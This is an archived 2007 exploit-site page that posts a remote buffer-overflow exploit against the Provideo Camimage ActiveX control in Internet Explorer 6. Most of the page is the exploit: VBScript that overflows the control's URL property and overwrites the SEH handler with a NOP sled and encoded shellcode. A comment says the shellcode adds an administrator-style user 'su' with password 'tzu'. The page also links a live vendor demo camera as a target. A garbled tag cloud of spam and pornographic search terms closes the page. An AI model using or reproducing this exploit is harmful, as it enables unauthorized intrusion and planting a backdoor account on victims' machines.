about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit




2007-06-03 IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit 
Rated as : Critical

<!-- IE6 / Provideo Camimage class (ISSCamControl.dll 1.0.1.5)
remote seh overwrite exploit / win2k sp4

tried the SD-222VPRO camera series,you can reach an online demo here:
http://www.provideo.com.tw/security%20live%20demo.htm

rgod
-->
<HTML>
<object classid='clsid:AA0FB75C-C50E-47B6-B7E0-3B9C3FAA8AC4'
id='Camimage' /></object>
<script language='vbscript'>

REM metasploit one, add a user 'su' with pass 'tzu'
shellcode   =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44")
+ NOP
seh_handler = unescape("%1e%16%e6%77") : REM 0x77e6161e call edi
user32.dll
nop         = string(96,unescape("%90"))
suntzu      = "http://www." + String(97,"a") +
seh_handler + nop + shellcode + nop + ".com"

Camimage.URL = suntzu

</script>
</HTML>

securitydot.net - 2007-06-03

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 02:42:44 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.extr b TOLLYWOOD Tagger LE __e34____1 search.php www3pic co @mail WWWSEXMOVI 200 /compo Www livese PHP-Nuke www.gl-cts www.988.jx PORNSITE gay monste www.cnxing www.328f.c Endonesia securityDo Tagger LE. php includ sdjnlipin. SquirrelMa provideo www.qq7t.c WWWSEXMOVI oracle 10g iilocefesy gay monste persiankit photo sext jaddresses www.xxx.co Trawler kaiten biggboss2i Tamilgirls anyvedio kareena ka news for c ip board 2 www.juqing Tems videos yut SEXYVIDEO. Vuln...r w wwwsexcom vidiosexab www.taokez S.TA.L.K.E